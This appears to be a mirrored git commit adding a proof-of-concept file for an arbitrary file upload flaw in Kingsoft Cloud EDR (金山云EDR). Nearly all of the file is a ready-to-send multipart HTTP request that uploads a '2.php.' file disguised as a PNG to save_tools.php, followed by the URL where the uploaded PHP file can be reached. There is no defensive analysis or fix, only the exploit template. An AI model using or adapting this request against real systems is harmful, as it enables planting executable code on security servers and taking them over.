mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-28 07:05:35 +08:00
525更新漏洞
This commit is contained in:
50
金山云EDR任意文件上传漏洞.md
Normal file
50
金山云EDR任意文件上传漏洞.md
Normal file
@@ -0,0 +1,50 @@
|
||||
## 金山云EDR任意文件上传漏洞
|
||||
|
||||
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
POST /softmanagement/distribute/save_tools.php HTTP/1.1
|
||||
Host: *:6868
|
||||
Content-Length: 582
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: null
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykMPE1WkVUSahanwB
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
|
||||
------WebKitFormBoundarykMPE1WkVUSahanwB
|
||||
Content-Disposition: form-data; name="toolFile"; filename="2.php."
|
||||
Content-Type: image/png
|
||||
|
||||
1111111
|
||||
------WebKitFormBoundarykMPE1WkVUSahanwB
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
æäº¤
|
||||
------WebKitFormBoundarykMPE1WkVUSahanwB
|
||||
Content-Disposition: form-data; name="size"
|
||||
|
||||
500
|
||||
------WebKitFormBoundarykMPE1WkVUSahanwB
|
||||
Content-Disposition: form-data; name="userSession"
|
||||
|
||||
1111111
|
||||
------WebKitFormBoundarykMPE1WkVUSahanwB
|
||||
Content-Disposition: form-data; name="modeID"
|
||||
|
||||
5
|
||||
------WebKitFormBoundarykMPE1WkVUSahanwB--
|
||||
```
|
||||
|
||||
文件路径
|
||||
|
||||
```
|
||||
http://192.168.37.134:6868/softmanagement/files/2.php
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user